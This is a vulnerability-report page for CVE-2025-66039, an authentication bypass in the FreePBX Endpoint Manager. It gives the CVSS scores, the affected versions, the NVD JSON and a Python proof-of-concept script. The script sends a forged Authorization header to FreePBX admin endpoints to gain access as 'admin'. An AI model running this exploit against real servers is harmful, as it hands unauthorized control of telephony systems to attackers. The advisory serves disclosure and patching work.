Security Vulnerability Report
CVE-2025-66039 CVSS 9.8 CRITICAL

CVE-2025-66039

Published: 2025-12-09 22:16:16
Last Modified: 2026-02-02 14:47:12

Description

FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Affected versions are vulnerable to an authentication bypass when the authentication type is set to "webserver". When an Authorization header with an arbitrary value is supplied, a session is associated with the target user regardless of whether valid credentials were provided. This issue is fixed in versions 16.0.44 and 17.0.23.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* - VULNERABLE
FreePBX Endpoint Manager < 16.0.44
FreePBX Endpoint Manager >= 17.0.1, < 17.0.23
FreePBX framework (see commit 04224253156543cd9932b90458660b2f19fc0e35, linked in the raw JSON references below)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-66039 PoC - FreePBX Endpoint Manager Authentication Bypass
# Target: FreePBX systems with Endpoint Manager module
# Condition: Authentication type set to 'webserver'
#
# NOTE(review): the endpoint list and the header format below are this PoC
# author's choices; the advisory text only states that an arbitrary
# Authorization value is accepted when the auth type is 'webserver'.


def exploit_auth_bypass(target_url: str, target_user: str = "admin") -> bool:
    """
    Exploit authentication bypass in FreePBX Endpoint Manager
    By providing arbitrary Authorization header, attacker can associate
    session with target user regardless of valid credentials.

    Sends one GET per entry in ``endpoints`` with a constructed Authorization
    header and stops at the first one that looks authenticated.

    Args:
        target_url: Base URL of the FreePBX instance; a trailing '/' is stripped.
        target_user: Username placed in the constructed header (default "admin").

    Returns:
        True on the first endpoint whose HTTP 200 body contains 'authenticated'
        or 'success' (case-insensitive); False if no endpoint matches.
        Network errors for an individual endpoint are printed, not raised.
    """
    endpoints = [
        "/admin/ajax.php?module=endpoint&command=update_endpoint",
        "/admin/ajax.php?module=endpoint&command=get_endpoints",
        "/admin/config.php?display=endpoint"
    ]
    # Construct arbitrary Authorization header
    # System incorrectly associates session with target_user
    # (the value is a constructed placeholder, not a real credential)
    headers = {
        'Authorization': f'Basic {target_user}:arbitrary_password',
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json'
    }
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to authenticate as: {target_user}")
    print(f"[*] Using arbitrary Authorization header")
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # verify=False disables TLS certificate validation for this request;
            # the client will accept any certificate presented by target_url.
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            # Check for successful authentication indicators
            # NOTE(review): this is a substring heuristic on the body — a page
            # that merely contains the word 'success' (e.g. in script text)
            # also matches, so false positives are possible.
            if response.status_code == 200:
                if 'authenticated' in response.text.lower() or 'success' in response.text.lower():
                    print(f"[+] VULNERABLE: Authentication bypass successful at {endpoint}")
                    print(f"[+] Response: {response.text[:200]}")
                    return True
                elif 'unauthorized' not in response.text.lower():
                    # Reported only; does not count as a confirmed bypass and
                    # the loop continues with the next endpoint.
                    print(f"[*] Possible access at {endpoint} - Status: {response.status_code}")
        except requests.RequestException as e:
            # Per-endpoint failure (timeout, connection error, ...) is
            # reported and the remaining endpoints are still tried.
            print(f"[-] Error accessing {endpoint}: {e}")
    print("[-] No vulnerable endpoints found or target not affected")
    return False


if __name__ == "__main__":
    # CLI entry point: a single positional argument, the base URL.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66039.py <target_url>")
        print("Example: python cve-2025-66039.py https://freepbx.example.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit_auth_bypass(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66039", "sourceIdentifier": "[email protected]", "published": "2025-12-09T22:16:15.757", "lastModified": "2026-02-02T14:47:12.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions are vulnerable to authentication bypass when the authentication type is set to \"webserver.\" When providing an Authorization header with an arbitrary value, a session is associated with the target user regardless of valid credentials. This issue is fixed in versions 16.0.44 and 17.0.23."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.0.44", "matchCriteriaId": "703A0A9A-676E-473F-A3B3-69E6316ACABF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.1", "versionEndExcluding": "17.0.23", "matchCriteriaId": "D7313952-094B-4519-946E-3726B0E4C7AD"}]}]}], "references": [{"url": "https://github.com/FreePBX/framework/commit/04224253156543cd9932b90458660b2f19fc0e35#diff-72f14a52840a61504a8e03cd195035b44e488aecd634b001bc6412a04bdc940bR20-R50", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80", "source": "[email protected]", "tags": ["Not Applicable", "Vendor Advisory"]}]}}